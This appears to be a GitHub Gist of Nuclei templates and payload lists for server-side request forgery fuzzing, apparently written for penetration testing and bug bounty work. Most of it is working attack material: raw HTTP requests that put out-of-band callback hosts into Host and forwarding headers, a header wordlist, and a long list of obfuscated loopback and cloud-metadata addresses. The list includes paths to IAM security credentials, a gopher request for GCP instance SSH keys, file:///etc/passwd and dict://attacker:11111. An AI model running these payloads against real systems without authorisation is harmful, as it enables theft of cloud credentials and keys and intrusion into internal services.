Last active
February 23, 2024 19:47
-
-
Save ResistanceIsUseless/e46848f67706a8aa1205c9d2866bff31 to your computer and use it in GitHub Desktop.
Nuclei SSRF Fuzzing Template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: header-blind-ssrf | |
| info: | |
| name: Header Blind SSRF Injection | |
| author: geeknik,nullrabbit | |
| severity: high | |
| description: Checks for Blind SSR via popular browser headers. | |
| tags: ssrf | |
| requests: | |
| - payloads: | |
| header: helpers/payloads/proxy-headers.txt | |
| raw: | |
| - | | |
| GET /?§header§ HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| §header§: {{interactsh-url}} | |
| Connection: close | |
| redirects: true | |
| max-redirects: 5 | |
| matchers-condition: and | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol | |
| words: | |
| - "dns" | |
| - "http" | |
| condition: or |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: header-injection | |
| info: | |
| name: Header SSRF Injection | |
| author: nullrabbit | |
| severity: high | |
| description: Fuzzing headers for OOB SSRF | |
| tags: fuzz,ssrf | |
| requests: | |
| - payloads: | |
| header: helpers/payloads/proxy-headers.txt | |
| - raw: | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}}@{{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}}@{{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{BaseURL}}@{{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET @{{interactsh-url}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET {{BaseURL}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-Host: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET /{{interactsh-url}}/{{interactsh-url}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET {{BaseURL}} HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-Host: {{interactsh-url}} | |
| Via: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{BaseURL}}/?{{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-Host: {{interactsh-url}} | |
| Via: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Referer: {{BaseURL}}/?url={{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Referer: {{BaseURL}}/?url={{interactsh-url}} | |
| True-Client-IP: {{interactsh-url}} | |
| X-WAP-Profile: http://{{interactsh-url}}/wap.xml | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Expect-Ct: max-age=6*6, report-uri="https://{{interactsh-url}}/expect-ct" | |
| Connection: close | |
| - | | |
| GET /admin HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| POST /admin HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-To: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET /api/v1/;;/admin/ HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET /api/;;/admin/ HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| GET /api/v1/secrets HTTP/1.1 | |
| Host: 127.0.0.1 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| CONNECT {{interactsh-url}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-Host: {{interactsh-url}} | |
| X-Forwarded-For: {{interactsh-url}} | |
| - | | |
| POST / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-For: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| HEAD / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| X-Forwarded-To: {{interactsh-url}} | |
| Connection: close | |
| - | | |
| HEAD / HTTP/1.1 | |
| Host: {{Hostname}} | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| HEAD / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| HEAD / HTTP/1.1 | |
| Host: {{interactsh-url}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET /stats HTTP/1.1 | |
| Host: 127.0.0.1:9901 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET /services HTTP/1.1 | |
| Host: 127.0.0.1:8001 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET /services HTTP/1.1 | |
| Host: 127.0.0.1:8444 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| redirects: true | |
| matchers-condition: or | |
| matchers: | |
| - type: status | |
| status: | |
| - 200 | |
| - 302 | |
| - type: word | |
| part: interactsh_protocol | |
| words: | |
| - "dns" | |
| - "http" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Proxy-Host | |
| Request-Uri | |
| X-Forwarded | |
| X-Forwarded-By | |
| X-Forwarded-For | |
| X-Forwarded-For-Original | |
| X-Forwarded-Host | |
| X-Forwarded-Server | |
| X-Forwarder-For | |
| X-Forward-For | |
| x-forwarded-proto | |
| Base-Url | |
| Http-Url | |
| Proxy-Url | |
| Redirect | |
| Real-Ip | |
| Referer | |
| Referer | |
| Referrer | |
| Refferer | |
| Uri | |
| X-Host | |
| X-Http-Destinationurl | |
| X-Http-Host-Override | |
| X-Original-Remote-Addr | |
| X-Original-Url | |
| X-Proxy-Url | |
| X-Rewrite-Url | |
| X-Real-Ip | |
| X-Remote-Addr | |
| x-requested-with | |
| x-request-id | |
| x-wap-profile | |
| x-csrftoken | |
| x-cluster-client-ip | |
| x-client-ip | |
| x-arbitrary | |
| uid | |
| true-client-ip | |
| proxy-host | |
| warning | |
| user-agent | |
| Location | |
| via | |
| Alt-Svc | |
| Proxy | |
| Profile | |
| Origin | |
| link | |
| from | |
| forwarded | |
| destination | |
| cookie | |
| contact | |
| cluster-client-ip | |
| cluster | |
| client-ip | |
| cf-connecting-ip | |
| alt-svc | |
| accept-language | |
| accept | |
| HTTP_FORWARDED | |
| HTTP_CLIENT_IP | |
| HTTP_FORWARDED_FOR | |
| HTTP_X_FORWARDED | |
| HTTP_X_FORWARDED_FOR | |
| if-modified-since |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 127.0.0.1 | |
| 127.0.1.3 | |
| 0 | |
| 127.1 | |
| 127.0.1 | |
| localhost | |
| 1.0.0.127.in-addr.arpa | |
| 01111111000000000000000000000001 | |
| 0x7f.0x0.0x0.0x1 | |
| 0177.0.0.01 | |
| 7F000001 | |
| 2130706433 | |
| 6425673729 | |
| 127001 | |
| 127_0._0_1 | |
| 0000::1 | |
| 0000::1:80 | |
| ::ffff:7f00:0001 | |
| 0000:0000:0000:0000:0000:ffff:7f00:0001 | |
| spoofed.burpcollaborator.net | |
| localtest.me | |
| customer1.app.localhost.my.company.127.0.0.1.nip.io | |
| bugbounty.dod.network | |
| 127.127.127.127 | |
| 0177.0.0.1 | |
| ⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80 | |
| ⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80 | |
| ②⑧⑤②⓪③⑨①⑥⑥:80 | |
| ⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80 | |
| whitelisted@127.0.0.1 | |
| 0x7f000001 | |
| 017700000001 | |
| 0177.00.00.01 | |
| 0000.0000.0000.0000 | |
| 0x7f.0x0.0x0.0x1 | |
| 0177.0000.0000.0001 | |
| 0177.0001.0000..0001 | |
| 0x7f.0x1.0x0.0x1 | |
| 0x7f.0x1.0x1 | |
| 0x7f.0x00.0x00.0x01 | |
| 0177.0.0.01 | |
| ht�️tp://12�7.0.0.1 | |
| localhost:+11211aaa | |
| localhost:00011211aaaa | |
| loopback:+11211aaa | |
| loopback:00011211aaaa | |
| ⑯⑨。②⑤④。⑯⑨。②⑤④ | |
| 169.254.169.254 | |
| 2852039166 | |
| 7147006462 | |
| 0xa9.0xfe.0xa9.0xfe | |
| 0251.0376.0251.0376 | |
| 169。254。169。254 | |
| 169。254。169。254 | |
| ⑯⑨。②⑤④。⑯⑨。②⑤④ | |
| ⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80 | |
| ⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80 | |
| ②⑧⑤②⓪③⑨①⑥⑥:80 | |
| ④②⑤。⑤①⓪。④②⑤。⑤①⓪:80 | |
| ⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80 | |
| ⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80 | |
| [::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 | |
| [::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 | |
| ⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80 | |
| ⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80 | |
| ⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80 | |
| ⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80 | |
| dict://attacker:11111 | |
| file:///etc/passwd | |
| file://\/\/etc/passwd | |
| file://path/to/file | |
| gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a | |
| gopher://nozaki.io/_SSRF%0ATest! | |
| 0.0.0.0:22 | |
| 0.0.0.0:443 | |
| 0.0.0.0:80 | |
| 0.0.0.0:443 | |
| 0.0.0.0:3389 | |
| 0000::1:22 | |
| 0000::1:25 | |
| 0000::1:3128 | |
| 0000::1:80 | |
| 0000::1:3389 | |
| 0177.0.0.1 | |
| 0251.00376.000251.0000376 | |
| 0251.0376.0251.0376 | |
| 0x41414141A9FEA9FE | |
| 0xA9.0xFE.0xA9.0xFE | |
| 0xA9FEA9FE | |
| 0xa9.0xfe.0xa9.0xfe | |
| 0xa9fea9fe | |
| 100.100.100.200/latest/meta-data/ | |
| 100.100.100.200/latest/meta-data/image-id | |
| 100.100.100.200/latest/meta-data/instance-id | |
| 127.0.0.0 | |
| 127.0.0.1:22 | |
| 127.0.0.1:2379/version | |
| 127.0.0.1:443 | |
| 127.0.0.1:80 | |
| 127.0.0.1:3389 | |
| 127.0.0.1:8000 | |
| 127.0.0.1:9901 | |
| 127.0.0.1:8001 | |
| 127.0.0.1:8444 | |
| 127.0.1.3 | |
| 127.1.1.1 | |
| 127.1.1.1:80#\@127.2.2.2:80 | |
| 127.1.1.1:80:\@@127.2.2.2:80 | |
| 127.1.1.1:80\@127.2.2.2:80 | |
| 127.1.1.1:80\@@127.2.2.2:80 | |
| 127.127.127.127 | |
| 127.127.127.127.nip.io | |
| 169.254.169.254 | |
| 169.254.169.254.xip.io | |
| 169.254.169.254/computeMetadata/v1/ | |
| 169.254.169.254/latest/dynamic/instance-identity/document | |
| 169.254.169.254/latest/meta-data/ | |
| 169.254.169.254/latest/meta-data/ami-id | |
| 169.254.169.254/latest/meta-data/hostname | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/ | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/s3access | |
| 169.254.169.254/latest/meta-data/public-keys/ | |
| 169.254.169.254/latest/meta-data/public-keys/0/openssh-key | |
| 169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key | |
| 169.254.169.254/latest/meta-data/reservation-id | |
| 169.254.169.254/latest/user-data | |
| 169.254.169.254/latest/user-data/iam/security-credentials/ | |
| 192.0.0.192/latest/ | |
| 192.0.0.192/latest/attributes/ | |
| 192.0.0.192/latest/meta-data/ | |
| 192.0.0.192/latest/user-data/ | |
| 1ynrnhl.xip.io | |
| 2130706433 | |
| 2852039166 | |
| 3232235521 | |
| 3232235777 | |
| 425.510.425.510 | |
| 7147006462 | |
| [0:0:0:0:0:ffff:127.0.0.1] | |
| [0:0:0:0:0:ffff:127.0.0.1]:8000 | |
| [0:0:0:0:0:ffff:127.0.0.1]:8001 | |
| [0:0:0:0:0:ffff:127.0.0.1]:8444 | |
| [0:0:0:0:0:ffff:127.0.0.1]:9901 | |
| [::] | |
| [::]:22 | |
| [::]:25 | |
| [::]:3128 | |
| [::]:80 | |
| [::]:3389 | |
| [::]:8000 | |
| [::]:8001 | |
| [::]:8444 | |
| [::]:9901 | |
| app-169-254-169-254.nip.io | |
| bugbounty.dod.network | |
| customer1.app.localhost.my.company.127.0.0.1.nip.io | |
| customer2-app-169-254-169-254.nip.io | |
| instance-data | |
| localhost:+11211aaa | |
| localhost:00011211aaaa | |
| localhost:22 | |
| localhost:443 | |
| localhost:80 | |
| localhost:3389 | |
| localhost:8000 | |
| localhost:8001 | |
| localhost:8444 | |
| localhost:9901 | |
| localhost.localdomain | |
| loopback | |
| loopback:22 | |
| loopback:80 | |
| loopback:443 | |
| loopback:3389 | |
| loopback:8000 | |
| loopback:9901 | |
| loopback:8001 | |
| loopback:8444 | |
| localtest.me | |
| ipcop.localdomain:8443 | |
| mail.ebc.apple.com | |
| metadata.google.internal/computeMetadata/v1/ | |
| metadata.google.internal/computeMetadata/v1/instance/hostname | |
| metadata.google.internal/computeMetadata/v1/instance/id | |
| metadata.google.internal/computeMetadata/v1/project/project-id | |
| metadata.nicob.net | |
| owasp.org.169.254.169.254.nip.io | |
| spoofed.burpcollaborator.net | |
| ssrf-169.254.169.254.localdomain.pw | |
| ssrf-cloud.localdomain.pw | |
| www.owasp.org.1ynrnhl.xip.io |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: ssrf-header-injection | |
| info: | |
| name: Header Command Injection | |
| author: nullrabbit | |
| severity: high | |
| description: Fuzzing headers for command injection | |
| tags: fuzz,ssrf | |
| requests: | |
| - payloads: | |
| payload: helpers/payloads/ssrf-hosts.txt | |
| header: helpers/payloads/proxy-headers.txt | |
| raw: | |
| - | | |
| GET / HTTP/1.1 | |
| Host: §payload§ | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Connection: close | |
| - | | |
| GET / HTTP/1.1 | |
| Host: {{Hostname}} | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| §header§ §payload§ | |
| Connection: close | |
| attack: clusterbomb | |
| threads: 10 | |
| matchers: | |
| - type: status | |
| status: | |
| - 200 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment